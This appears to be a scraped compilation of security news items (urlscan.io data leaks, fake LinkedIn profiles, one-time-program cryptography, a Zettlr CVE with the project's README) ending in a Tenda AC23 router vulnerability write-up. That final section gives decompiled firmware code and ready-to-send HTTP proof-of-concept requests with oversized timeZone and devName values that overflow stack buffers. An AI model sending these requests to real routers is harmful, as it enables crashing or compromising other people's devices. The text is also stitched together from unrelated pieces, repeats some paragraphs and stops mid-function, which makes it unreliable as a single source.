Security researchers are warning of "a trove of sensitive information" leaking through urlscan.io, a website scanner for suspicious and malicious URLs.
"Sensitive URLs to shared documents, password reset pages, team invites, payment invoices and more are publicly listed and searchable," Positive Security co-founder, Fabian Bräunlein, said in a report published on November 2, 2022.
The

Security researchers are warning of "a trove of sensitive information" leaking through urlscan.io, a website scanner for suspicious and malicious URLs.

"Sensitive URLs to shared documents, password reset pages, team invites, payment invoices and more are publicly listed and searchable," Positive Security co-founder, Fabian Bräunlein, said in a report published on November 2, 2022.

The Berlin-based cybersecurity firm said it started an investigation in the aftermath of a notification sent by GitHub in February 2022 to an unknown number of users about sharing their usernames and private repository names (i.e., GitHub Pages URLs) to urlscan.io for metadata analysis as part of an automated process.

Urlscan.io, which has been described as a sandbox for the web, is integrated into several security solutions via its API.

"With the type of integration of this API (for example via a security tool that scans every incoming email and performs a urlscan on all links), and the amount of data in the database, there is a wide variety of sensitive data that can be searched for and retrieved by an anonymous user," Bräunlein noted.

This included password reset links, email unsubscribe links, account creation URLs, API keys, information about Telegram bots, DocuSign signing requests, shared Google Drive links, Dropbox file transfers, invite links to services like SharePoint, Discord, Zoom, PayPal invoices, Cisco Webex meeting recordings, and even URLs for package tracking.

Bräunlein pointed out that an initial search in February revealed "juicy URLs" belonging to Apple domains, some of which also consisted of publicly-shared links to iCloud files and calendar invite responses, and have since been removed.

Apple is said to have requested an exclusion of its domains from the URL scans such that results matching certain predefined rules are periodically deleted.

Positive Security further added that it reached out to a number of those leaked email addresses, receiving one response from an unnamed organization that traced the leak of a DocuSign work contract link to a misconfiguration of its Security Orchestration, Automation, and Response (SOAR) solution, which was being integrated with urlscan.io.

On top of that, the analysis has also found that misconfigured security tools are submitting any link received via mail as a public scan to urlscan.io.

This could have serious consequences wherein a malicious actor can trigger password reset links for the affected email addresses and exploit the scan results to capture the URLs and take over the accounts by resetting to a password of the attacker's choice.

To maximize the effectiveness of such an attack, the adversary can search data breach notification sites like Have I Been Pwned to determine the exact services that were registered using the email addresses in question.

Urlscan.io, following responsible disclosure from Positive Security in July 2022, has urged users to "understand the different scan visibilities, review your own scans for non-public information, review your automated submission workflows, \[and\] enforce a maximum scan visibility for your account."

It has also added deletion rules to regularly purge delete past and future scans matching the search patterns, stating it has domain and URL pattern blocklists in place to prevent scanning of particular websites.

"This information could be used by spammers to collect email addresses and other personal information," Bräunlein said. "It could be used by cyber criminals to take over accounts and run believable phishing campaigns."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Experts Find Urlscan Security Scanner Inadvertently Leaks Sensitive URLs and Data

For whatever reason, the majority of the phony LinkedIn profiles reviewed by this author have involved young women with profile photos that appear to be generated by artificial intelligence (AI) tools.

We’re seeing rapid advances in AI-based synthetic image generation technology and we’ve created a deep learning model to better catch profiles made with this technology. AI-based image generators can create an unlimited number of unique, high-quality profile photos that do not correspond to real people. Fake accounts sometimes use these convincing, AI-generated profile photos to make their fake LinkedIn profile appear more authentic.

Responding to a recent surge in AI-generated bot accounts, **LinkedIn** is rolling out new features that it hopes will help users make more informed decisions about with whom they choose to connect. Many LinkedIn profiles now display a creation date, and the company is expanding its domain validation offering, which allows users to publicly confirm that they can reply to emails at the domain of their stated current employer.

LinkedIn’s new “About This Profile” section — which is visible by clicking the “More” button at the top of a profile — includes the year the account was created, the last time the profile information was updated, and an indication of how and whether an account has been verified.

LinkedIn also said it is adding a warning to some LinkedIn messages that include high-risk content, or that try to entice the user into taking the conversation to another platform (like WeChat).

“We may warn you about messages that ask you to take the conversation to another platform because that can be a sign of a scam,” the company said in a blog post. “These warnings will also give you the choice to report the content without letting the sender know.”

In late September 2022, KrebsOnSecurity warned about the proliferation of fake LinkedIn profiles for Chief Information Security Officer (CISO) roles at some of the world’s largest corporations. A follow-up story on Oct. 5 showed how the phony profile problem has affected virtually all executive roles at corporations, and how these fake profiles are creating an identity crisis for the businesses networking site and the companies that rely on it to hire and screen prospective employees.

Reporting here last month also tracked a massive drop in profiles claiming to work at several major technology companies, as LinkedIn apparently took action against hundreds of thousands of inauthentic accounts that falsely claimed roles at these companies.

For example, on October 10, 2022, there were 576,562 **LinkedIn** accounts that listed their current employer as **Apple Inc.** The next day, half of those profiles no longer existed. At around the same time, the number of LinkedIn profiles claiming current roles at **Amazon** fell from roughly 1.25 million to 838,601 in just one day, a 33 percent drop.

For whatever reason, the majority of the phony LinkedIn profiles reviewed by this author were young women with profile photos that appear to have been generated by artificial intelligence (AI) tools.

“We’re seeing rapid advances in AI-based synthetic image generation technology and we’ve created a deep learning model to better catch profiles made with this technology,” LinkedIn’s **Oscar Rodriguez** wrote. “AI-based image generators can create an unlimited number of unique, high-quality profile photos that do not correspond to real people.”

It remains unclear who or what is behind the recent proliferation of fake executive profiles on LinkedIn, but likely they are from a combination of scams. Cybersecurity firm **Mandiant** (recently acquired by **Google**) told Bloomberg that hackers working for the North Korean government have been copying resumes and profiles from leading job listing platforms LinkedIn and **Indeed**, as part of an elaborate scheme to land jobs at cryptocurrency firms.

Identity thieves have been known to masquerade on LinkedIn as job recruiters, collecting personal and financial information from people who fall for employment scams.

Also, fake profiles also may be tied to so-called “pig butchering” scams, wherein people are lured by flirtatious strangers online into investing in cryptocurrency trading platforms that eventually seize any funds when victims try to cash out.

LinkedIn Adds Verified Emails, Profile Creation Dates

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 28 and Nov. 4. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for October 28 to November 4

Authentication idea advanced but not yet fulfilled

Authentication idea advanced but not yet fulfilled

ANALYSIS Advances in technology over the last decade have enabled academics to make progress in creating so-called one-time programs.

One-time programs (OTPs) – originally presented at the Crypto ‘08 conference – describe a type of cryptographically obfuscated computer program that can be run only once, a special property that makes them useful for several applications and use cases.

OTPs were first proposed by researchers Goldwasser, Kalai, and Rothblum.

The general idea is that ‘Alice’ can send ‘Bob’ a computer program that is encrypted in such a way that:

1.  Bob can run the program on any computer with any valid inputs and obtain a correct result. Bob cannot rerun the program with different inputs.
2.  Bob can learn nothing about the secret program by running it.

The run-only-once requirement runs into trouble because it would be trivial to install a run-once-only program on multiple virtual machines, trying each one with different inputs. This would violate the whole premise of the technology.

The original idea for thwarting this (fairly obvious) hack was to only allow the secret program to run if accompanied by a physical token that somehow enforced the one-time rule for running the copy of the secret program that Alice had sent to Bob.

No such tokens were ever made, so the whole idea has lain dormant for more than a decade.

**OTP revived**

But now a team of computer scientists from Johns Hopkins University and NTT Research have laid the groundwork for how it might be possible to build one-time programs using a combination of the functionality found in the chips found in mobile phones and cloud-based services.

More specifically they have hacked ‘counter lockbox’ technology and applied its use to an unintended purpose. Counter lockboxes protect an encryption key under a user-specified password, enforcing a limited number of incorrect password guesses (typically 10) before the protected information is erased.

The hardware security module in iPhones or Android smartphones provides the needed base functionality, but it needs to be wrapped around technology that prevents Bob from attempting to cheat the system – the focus of the research.

**Garbled circuits**

The researchers’ work shows how multiple counter lockboxes might be chained together to form so-called ‘garbled circuits’, a construction that might be used to build one-time programs.

A paper describing this research, entitled ‘One-Time Programs from Commodity Hardware’ is due to be presented at the upcoming Theory of Cryptography conference (TCC 2022).

The clearest application for OTPs is preventing brute-force attacks, says one researcher

  
**Hardware-route discounted**

One alternative means of constructing one-time programs, considered by the paper, is using tamper-proof hardware. But tamper-proof hardware would require a “token with a very powerful and expensive (not to mention complex) general-purpose CPU”, as explained in a blog post by cryptographer Matthew Green, a professor at Johns Hopkins University and one of the co-authors of the paper.

“This would be costly and worse, \[and\] would embed a large attack software and hardware attack surface – something we have learned a lot about recently thanks to Intel’s SGX, which keeps getting broken by researchers,” Green explains.

RELATED Post-quantum cryptography hits standardization milestone

Rather than relying on hardware or the potential use of blockchain plus cryptographic tool-based technology, the Johns Hopkins’ researchers have built a form of memory device or token that spits out and erases secret keys when asked. It takes hundreds of lockboxes to make this construction – at least 256 for a 128-bit secret, a major drawback that the researchers are yet to overcome.

In practical terms, someone could realize this technology by creating multiple iCloud or Google accounts and then using Apple’s iCloud Key Vault \[pdf\] or Google’s Titan Backup service to store a ‘backup key’ for each of them. This is anything but elegant and the computer scientists at John Hopkins are inviting other researchers to progressing their research by coming up with neater schemes.

**A bastion against brute-force attacks**

Harry Eldridge from Johns Hopkins University, who is lead author of the paper, told The Daily Swig that one-time programs could have multiple uses.

“The clearest application of a one-time program (OTP) is preventing brute-force attacks against passwords,” Eldridge explained. “For example, rather than send someone an encrypted file, you could send them an OTP that outputs the file if given the correct password. Then, the person on the other end can input their password to the OTP and retrieve the file.

“However, because of the one-time property of the OTP, a malicious actor only gets one chance to guess the password before being locked out forever, meaning that much weaker passwords \[such as a four-digit PIN\] can actually be pretty secure,” Eldridge added.

More generally this could be applied to other forms of authentication – for example if you wanted to protect a file using some sort of biometric match like a fingerprint or face scan.

**‘Autonomous’ ransomware risk**

One danger posed by the approach is that bad guys might use the technique to develop ‘autonomous’ ransomware.

“Typically, ransomware needs to ‘phone home’ somehow in order to fetch the decryption keys after the bounty has been paid, which adds an element of danger to the group perpetrating the attack,” according to Eldridge. “If they were able to use one-time programs however, they could include with the ransomware an OTP that outputs the decryption keys when given proof that an amount of bitcoin has been paid to a certain address, completely removing the need to phone home at all.”

Read more of the latest encryption security news

The feedback on the work so far has been “generally positive”, according to Eldridge.

“\[Most agree\] with the motivation that OTPs are an interesting but mostly unrealized cryptographic idea, with the most common criticism being that the number of lockboxes required by our construction is still rather high,” Eldridge told The Daily Swig. “There is possibly a way to more cleverly use lockboxes that would allow for fewer of them to be used.”

Professor Alan Woodward, a computer scientist at the University of Surrey, welcomed the research.

“It’s a nice paper and it doesn’t claim to be the ultimate answer: it gives a solution in the hope that others may find better ways of doing the same thing,” Prof. Woodward told The Daily Swig.

“If achievable it means one-time programs become viable, and that opens up an interesting array of applications where you want someone to be able to run your program but not to be able to undertake differential analysis to learn about how the program functions.”

RECOMMENDED Matrix address flaws that break message encryption assurances

Boffins rekindle one-time program cryptographic concept

WebKit suffers from an HTMLSelectElement use-after-free vulnerability.

WebKit HTMLSelectElement Use-After-Free

Zettlr version 2.3.0 allows an external attacker to remotely obtain arbitrary local files on any client that attempts to view a malicious markdown file through Zettlr. This is possible because the application does not have a CSP policy (or at least not strict enough) and/or does not properly validate the contents of markdown files before rendering them.

**  
Zettlr \[_ˈset·lər_\]**

**A Markdown Editor for the 21st century**.

     

Homepage | Download | Documentation | Discord | Contributing | Support Us

With Zettlr, writing professional texts is easy and motivating: Whether you are a college student, a researcher, a journalist, or an author — Zettlr has the right tools for you. Watch the video or continue reading to see what they are!

Visit our Website.

**Features**

*   Available in over a dozen languages
*   Tight and ever-growing **integration with your favourite reference manager** (such as Zotero or JabRef)
*   **Cite with Zettlr** using citeproc and your existing literature database
*   Five **themes and dark mode support**
*   File-agnostic writing: Enjoy **full control over your own files**
*   Keep all your notes and texts **in one place** — searchable and accessible
*   **Code highlighting** for many languages
*   Simple and beautiful **exports** with Pandoc, LaTeX, and Textbundle
*   Support for state of the art knowledge management techniques (**Zettelkasten**)
*   A revolutionary **search algorithm** with integrated heatmap

… and the best is: **Zettlr is Open Source (FOSS)!**

**Installation**

To install Zettlr, just download the latest release for your operating system! Currently supported are macOS, Windows, and most Linux distributions (via Debian- and Fedora-packages as well as AppImages).

All other platforms that Electron supports are supported as well, but you will need to build the app yourself for this to work.

**Please also consider becoming a patron or making a one-time donation!**

**Getting Started**

After you have installed Zettlr, head over to our documentation to get to know Zettlr. Refer to the Quick Start Guide, if you prefer to use software heads-on.

**Contributing**

Zettlr is an Electron\-based app, so to start developing, you'll need to have:

1.  A NodeJS\-stack installed on your computer. Make sure it's at least Node 14 (lts/fermium). To test what version you have, run node -v.
2.  Yarn installed. Yarn is the required package manager for the project, as we do not commit package-lock.json\-files and many commands require yarn. You can install this globally using npm install -g yarn or Homebrew, if you are on macOS.

Then, simply clone the repository and install the dependencies on your local computer:

$ git clone https://github.com/Zettlr/Zettlr.git
$ cd Zettlr
$ yarn install --frozen-lockfile

The --frozen-lockfile flag ensures that yarn will stick to the versions as listed in the yarn.lock and not attempt to update them.

During development, hot module reloading is active so that you can edit the renderer's code easily and hit F5 after the changes have been compiled by electron-forge. You can keep the developer tools open to see when HMR has finished loading your changes.

**What Should I Know To Contribute Code?**

In order to provide code, you should have basic familiarity with the following topics and/or manuals (ordered by importance descending):

*   JavaScript (especially asynchronous code) and TypeScript
*   Node.js
*   Electron
*   Vue.js (2.x) and Vuex
*   CodeMirror (5.x)
*   ESLint
*   LESS
*   Webpack 5.x
*   Electron forge
*   Electron builder

> Note: See the "Directory Structure" section below to get an idea of how Zettlr specifically works.

**Development Commands**

This section lists all available commands that you can use during application development. These are defined within the package.json and can be run from the command line by prefixing them with yarn. Run them from within the base directory of the repository.

**start**

Starts electron-forge, which will build the application and launch it in development mode. This will use the normal settings, so if you use Zettlr on the same computer in production, it will use the same configuration files as the regular application. This means: be careful when breaking things. In that case, it's better to use test-gui.

**package**

Packages the application, but not bundle it into an installer. Without any suffix, this command will package the application for your current platform and architecture. To create specific packages (may require running on the corresponding platform), the following suffixes are available:

*   package:mac-x64 (Intel-based Macs)
*   package:mac-arm (Apple Silicon-based Macs)
*   package:win-x64 (Intel-based Windows)
*   package:win-arm (ARM-based Windows)
*   package:linux-x64 (Intel-based Linux)
*   package:linux-arm (ARM-based Linux)

The resulting application packages are stored in ./out.

> This command will skip typechecking to speed up builds, so be extra cautious.

**release:{platform-arch}**

Packages the application and then bundles it into an installer for the corresponding platform and architecture. To create such a bundle (may require running on the corresponding platform), one of the following values for {platform-arch} is required:

*   release:mac-x64 (Intel-based Macs)
*   release:mac-arm (Apple Silicon-based Macs)
*   release:win-x64 (Intel-based Windows)
*   release:win-arm (ARM-based Windows)
*   release:linux-x64 (Intel-based Linux)
*   release:linux-arm (ARM-based Linux)

The resulting setup bundles are stored in ./release.

> Please note that, while you can package directly for your platform without any suffix, for creating a release specifying the platform is required as electron-builder would otherwise include the development-dependencies in the app.asar, resulting in a bloated application.

**lang:refresh**

This downloads the four default translations of the application from Zettlr Translate, with which it is shipped by default. It places the files in the static/lang\-directory. Currently, the default languages are: German (Germany), English (USA), English (UK), and French (France).

> Please note, that this command is intended for an automated workflow that runs from time to time on the repository to perform this action. This means: Do **not** commit updated files to the repository. Instead, the updated files will be downloaded whenever you git fetch.

**csl:refresh**

This downloads the Citation Style Language (CSL) files with which the application is shipped, and places them in the static/csl-locales\- and static/csl-styles\-directories respectively.

> Please note, that this command is intended for an automated workflow that runs from time to time on the repository to perform this action. This means: Do **not** commit updated files to the repository. Instead, the updated files will be downloaded whenever you git fetch.

**lint**

This simply runs ESLint. Apps such as Atom or Visual Studio Code will automatically run ESLint in the background, but if you want to be extra-safe, make sure to run this command prior to submitting a Pull Request.

> This command will run automatically on each Pull Request to check your code for inconsistencies.

**reveal:build**

This re-compiles the source-files needed by the exporter for building reveal.js\-presentations. Due to the nature of how Pandoc creates such presentations, Zettlr needs to modify the output by Pandoc, which is why these files need to be pre-compiled.

> Please note, that this command is intended for an automated workflow that runs from time to time on the repository to perform this action. This means: Do **not** commit updated files to the repository. Instead, the updated files will be downloaded whenever you git fetch.

**test**

This runs the unit tests in the directory ./test. Make sure to run this command prior to submitting a Pull Request, as this will be run every time you commit to the PR, and this way you can make sure that your changes don't break any tests, making the whole PR-process easier.

**test-gui**

Use this command to carefree test any changes you make to the application. This command will start the application as if you ran yarn start, but will provide a custom configuration and a custom directory.

> This command will skip typechecking to speed up builds, so be extra cautious.

**The first time you start this command**, pass the --clean\-flag to copy a bunch of test-files to your ./resources\-directory, create a test-config.yml in your project root, and start the application with this clean configuration. Then, you can adapt the test-config.yml to your liking (so that certain settings which you would otherwise _always_ set will be pre-set without you having to open the preferences).

Whenever you want to reset the test directory to its initial state (or you removed the directory, or cloned the whole project anew), pass the flag --clean to the command in order to create or reset the directory. **This is also necessary if you changed something in test-config.yml**.

You can pass additional command-line switches such as --clear-cache to this command as well. They will be passed to the child process.

> Attention: Before first running the command, you **must** run it with the --clean\-flag to create the directory in the first place!

Additionally, have a look at our full development documentation.

**Directory Structure**

Zettlr is a mature app that has amassed hundreds of directories over the course of its development. Since it is hard to contribute to an application without any guidance, we have compiled a short description of the directories with how they interrelate.

    .
    ├── resources                      # Contains resource files
    │   ├── NSIS                       # Images for the Windows installer
    │   ├── icons                      # Icons used to build the application
    │   ├── screenshots                # The screenshots used in this README file
    ├── scripts                        # Scripts that are run by the CI and some YARN commands
    │   ├── assets                     # Asset files used by some scripts
    │   └── test-gui                   # Test files used by `yarn test-gui`
    ├── source                         # Contains the actual source code for the app
    │   ├── app                        # Contains service providers and the boot/shutdown routines
    │   ├── common                     # Common files used by several or all renderer processes
    │   │   ├── fonts                  # Contains the font files (note: location will likely change)
    │   │   ├── img                    # Currently unused image files
    │   │   ├── less                   # Contains the themes (note: location will likely change)
    │   │   ├── modules                # Contains renderer modules
    │   │   │   ├── markdown-editor    # The central CodeMirror markdown editor
    │   │   │   ├── preload            # Electron preload files
    │   │   │   └── window-register    # Run by every renderer during setup
    │   │   ├── util                   # A collection of utility functions
    │   │   └── vue                    # Contains Vue components used by the graphical interface
    │   ├── main                       # Contains code for the main process
    │   │   ├── assets                 # Static files (note: location will likely change)
    │   │   ├── commands               # Commands that perform user-actions, run from within zettlr.ts
    │   │   └── modules                # Main process modules
    │   │       ├── document-manager   # The document manager handles all open files
    │   │       ├── export             # The exporter converts Markdown files into other formats
    │   │       ├── fsal               # The File System Abstraction Layer provides the file tree
    │   │       ├── import             # The importer converts other formats into Markdown files
    │   │       └── window-manager     # The window manager manages all application windows
    │   ├── win-about                  # Code for the About window
    │   ├── win-custom-css             # Code for the Custom CSS window
    │   ├── win-defaults               # Code for the defaults file editor
    │   ├── win-error                  # The error modal window
    │   ├── win-log-viewer             # Displays the running logs from the app
    │   ├── win-main                   # The main window
    │   ├── win-paste-image            # The modal displayed when pasting an image
    │   ├── win-preferences            # The preferences window
    │   ├── win-print                  # Code for the print and preview window
    │   ├── win-quicklook              # Code for the Quicklook windows
    │   ├── win-stats                  # Code for the general statistics window
    │   ├── win-tag-manager            # Code for the tag manager
    │   └── win-update                 # The dedicated update window
    ├── static                         # Contains static files, cf. the README-file in there
    └── test                           # Unit tests
    

**On the Distinction between Modules and Service Providers**

You'll notice that Zettlr contains both "modules" and "service providers". The difference between the two is simple: Service providers run in the main process and are completely autonomous while providing functionality to the app as a whole. Modules, on the other hand, provide functionality that must be triggered by user actions (e.g. the exporter and the importer).

**The Application Lifecycle**

Whenever you run Zettlr, the following steps will be executed:

0.  Execute source/main.ts
1.  Environment check (source/app/lifecycle.ts::bootApplication)
2.  Boot service providers (source/app/lifecycle.ts::bootApplication)
3.  Boot main application (source/main/zettlr.ts)
4.  Load the file tree and the documents
5.  Show the main window

And when you shut down the app, the following steps will run:

1.  Close all windows except the main window
2.  Attempt to close the main window
3.  Shutdown the main application (source/main/zettlr.ts::shutdown)
4.  Shutdown the service providers (source/app/lifecycle.ts::shutdownApplication)
5.  Exit the application

During development of the app (yarn start and yarn test-gui), the following steps will run:

1.  Electron forge will compile the code for the main process and each renderer process separately (since these are separate processes), using TypeScript and webpack to compile and transpile.
2.  Electron forge will put that code into the directory .webpack, replacing the constants you can find in the "create"-methods of the window manager with the appropriate entry points.
3.  Electron forge will start a few development servers to provide hot module reloading (HMR) and then actually start the application.

Whenever the app is built, the following steps will run:

1.  Electron forge will perform steps 1 and 2 above, but instead of running the app, it will package the resulting code into a functional app package.
2.  Electron builder will then take these pre-built packages and wrap them in a platform-specific installer (DMG-files, Windows installer, or Linux packages).

Electron forge will put the packaged applications into the directory ./out while Electron builder will put the installers into the directory ./release.

**Command-Line Switches**

The Zettlr binary features a few command line switches that you can make use of for different purposes.

**--launch-minimized**

This CLI flag will instruct Zettlr not to show the main window on start. This is useful to create autostart entries. In that case, launching Zettlr with this flag at system boot will make sure that you will only see its icon in the tray.

Since this implies the need to have the app running in the tray bar or notification area when starting the app like this, it will automatically set the corresponding setting system.leaveAppRunning to true.

> Note: This flag will not have any effect on Linux systems which do not support displaying an icon in a tray bar or notification area.

**--clear-cache**

This will direct the File System Abstraction Layer to fully clear its cache on boot. This can be used to mitigate issues regarding changes in the code base. To ensure compatibility with any changes to the information stored in the cache, the cache is also automatically cleared when the version field in your config.json does not match the one in the package.json, which means that, as long as you do not explicitly set the version\-field in your test-config.yml, the cache will always be cleared on each run when you type yarn test-gui.

**--data-dir=path**

Use this switch to specify custom data directory, which holds your configuration files. Without this switch data directory defaults to %AppData%/Zettlr (on Windows 10), ~/.config/Zettlr (on Linux), etc. The path can be absolute or relative. Basis for the relative path will be either the binary's directory (when running a packaged app) or the repository root directory (when running an app that is not packaged). If the path contains spaces, do not forget to escape it in quotes. ~ to denote home directory does not work. Due to the bug in Electron an empty Dictionaries subdirectory is created in the default data directory, but it does not impact functionality.

**--disable-hardware-acceleration**

This switch causes Zettlr to disable hardware acceleration, which could be necessary in certain setups. For more information on why this flag was added, see issue #2127.

**VSCode Extension Recommendations**

This repository makes use of Visual Studio Code's recommended extensions feature. This means: If you use VS Code and open the repository for the first time, VS Code will tell you that the repository recommends to install a handful of extensions. These extensions are recommended if you work with Zettlr and will make contributing much easier. The recommendations are specified in the file .vscode/extensions.json.

Since installing extensions is sometimes a matter of taste, we have added short descriptions for each recommended extension within that file to explain why we recommend it. This way you can make your own decision whether or not you want to install any of these extensions (for example, the SVG extension is not necessary if you do not work with the SVG files provided in the repository).

If you choose not to install all of the recommended extensions at once (which we recommend), VS Code will show you the recommendations in the extensions sidebar so you can first decide which of the ones you'd like to install and then manually install those you'd like to have.

> Using the same extensions as the core developer team will make the code generally more consistent since you will have the same visual feedback.

**License**

This software is licensed via the GNU GPL v3-License.

The brand (including name, icons and everything Zettlr can be identified with) is excluded and all rights reserved. If you want to fork Zettlr to develop another app, feel free but please change name and icons. Read about the logo usage.

CVE-2022-40276: GitHub - Zettlr/Zettlr: A Markdown Editor for the 21st century.

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the firewallEn parameter in the formSetFirewallCfg function.

**ac23**

版本信息：V16.03.07.45\_cn

**fromSetSysTime→sub\_496104→strcpy((char \*)v6, s);**

if ( !strcmp(v20, "sync") )
  {
    v19 = sub\_496104(a1);
    v14 = sub\_4C9C40(v19);
  }

int \_\_fastcall sub\_496104(int a1)
{
  int v2; // \[sp+1Ch\] \[+1Ch\]
  int v3; // \[sp+20h\] \[+20h\]
  char \*s; // \[sp+24h\] \[+24h\]
  int v5; // \[sp+28h\] \[+28h\]
  \_\_int16 v6\[8\]; // \[sp+2Ch\] \[+2Ch\] BYREF
  \_WORD v7\[8\]; // \[sp+3Ch\] \[+3Ch\] BYREF
  int v8\[2\]; // \[sp+4Ch\] \[+4Ch\] BYREF
  int v9\[5\]; // \[sp+54h\] \[+54h\] BYREF

  v5 = 0;
  v6\[0\] = 48;
  v6\[1\] = 0;
  v6\[2\] = 0;
  v6\[3\] = 0;
  v6\[4\] = 0;
  v6\[5\] = 0;
  v6\[6\] = 0;
  v6\[7\] = 0;
  strcpy((char \*)v7, "0");
  v7\[1\] = 0;
  v7\[2\] = 0;
  v7\[3\] = 0;
  v7\[4\] = 0;
  v7\[5\] = 0;
  v7\[6\] = 0;
  v7\[7\] = 0;
  v8\[0\] = 0;
  v8\[1\] = 0;
  v9\[0\] = 0;
  v9\[1\] = 0;
  v9\[2\] = 0;
  v9\[3\] = 0;
  s = (char \*)websGetVar(a1, "timeZone", &unk\_4DDAE4);
  v3 = websGetVar(a1, "timePeriod", &unk\_4DDAE4);
  v2 = websGetVar(a1, "ntpServer", "time.windows.com");
  if ( strchr(s, ':') )
  {
    sscanf(s, "%\[^:\]:%s", v6, v7);//stack overflow
  }
  else
  {
    strcpy((char \*)v6, s);
    strcpy((char \*)v7, "0");
  }
  SetValue("sys.timesyn", "1");
  SetValue("sys.timemode", "auto");
  SetValue("sys.timezone", v6);
  SetValue("sys.timenextzone", v7);
  SetValue("sys.timefixper", v3);
  SetValue("sys.timentpserver", v2);
  if ( !CommitCfm() )
    return 1;
  GetValue("sys.timesyn", v8);
  if ( atoi((const char \*)v8) == 1 )
    sprintf((char \*)v9, "op=%d", 3);
  else
    sprintf((char \*)v9, "op=%d", 2);
  send\_msg\_to\_netctrl(24, v9);
  return v5;
}

**poc**

POST /goform/SetSysTimeCfg HTTP/1.1
Host: 192.168.0.1
Content-Length: 787
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/system\_time.html?random=0.6878395284342707&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251mzhcvb
Connection: close

timeType=sync&timePeriod=86400&ntpServer=time.windows.com&timeZone=aa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&time=2000-01-01%2023%3A39%3A00

**formSetDeviceName→set\_device\_name→sprintf(v4, "%s;1", a1);**

int \_\_fastcall formSetDeviceName(int a1)
{
  int result; // $v0
  int v2; // \[sp+18h\] \[+18h\]
  const char \*v3; // \[sp+1Ch\] \[+1Ch\]
  const char \*v4; // \[sp+20h\] \[+20h\]
  int v5\[9\]; // \[sp+24h\] \[+24h\] BYREF

  v5\[0\] = 0;
  v5\[1\] = 0;
  v5\[2\] = 0;
  v5\[3\] = 0;
  v5\[4\] = 0;
  v5\[5\] = 0;
  v5\[6\] = 0;
  v5\[7\] = 0;
  v2 = 0;
  v4 = (const char \*)websGetVar(a1, "mac", &unk\_4DEB84);
  v3 = (const char \*)websGetVar(a1, "devName", &unk\_4DEB84);
  if ( set\_device\_name(v3, v4) )//stack\_overflow
  {
    sprintf((char \*)v5, "{\\"errCode\\":%d}", 1);
    result = websTransfer(a1, (const char \*)v5);
  }
  else
  {
    if ( !CommitCfm() )
      v2 = 1;
    sprintf((char \*)v5, "{\\"errCode\\":%d}", v2);
    result = websTransfer(a1, (const char \*)v5);
  }
  return result;
}

set\_device\_name

sprintf(v3, "client.devicename%s", (const char \*)v5);
sprintf(v4, "%s;1", a1);
SetValue(v3, v4);

**poc**

POST /goform/SetOnlineDevName HTTP/1.1
Host: 192.168.0.1
Content-Length: 264
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/system\_time.html?random=0.9865714904007963&
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close

mac=9c:fc:e8:da:9c:5b&devName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**setSchedWifi→ strcpy((char \*)ptr + 2, v8)**

int \_\_fastcall setSchedWifi(int a1)
{
  int v1; // $v0
  void \*ptr; // \[sp+30h\] \[+30h\]
  int i; // \[sp+34h\] \[+34h\]
  char \*s; // \[sp+38h\] \[+38h\]
  char \*nptr; // \[sp+3Ch\] \[+3Ch\]
  const char \*v7; // \[sp+40h\] \[+40h\]
  const char \*v8; // \[sp+44h\] \[+44h\]
  char \*v9; // \[sp+48h\] \[+48h\]
  int v10; // \[sp+4Ch\] \[+4Ch\]
  int v11; // \[sp+50h\] \[+50h\]
  int v12\[2\]; // \[sp+54h\] \[+54h\] BYREF
  int v13; // \[sp+5Ch\] \[+5Ch\] BYREF
  int v14; // \[sp+60h\] \[+60h\] BYREF
  int v15; // \[sp+64h\] \[+64h\] BYREF
  int v16; // \[sp+68h\] \[+68h\] BYREF
  int v17; // \[sp+6Ch\] \[+6Ch\] BYREF
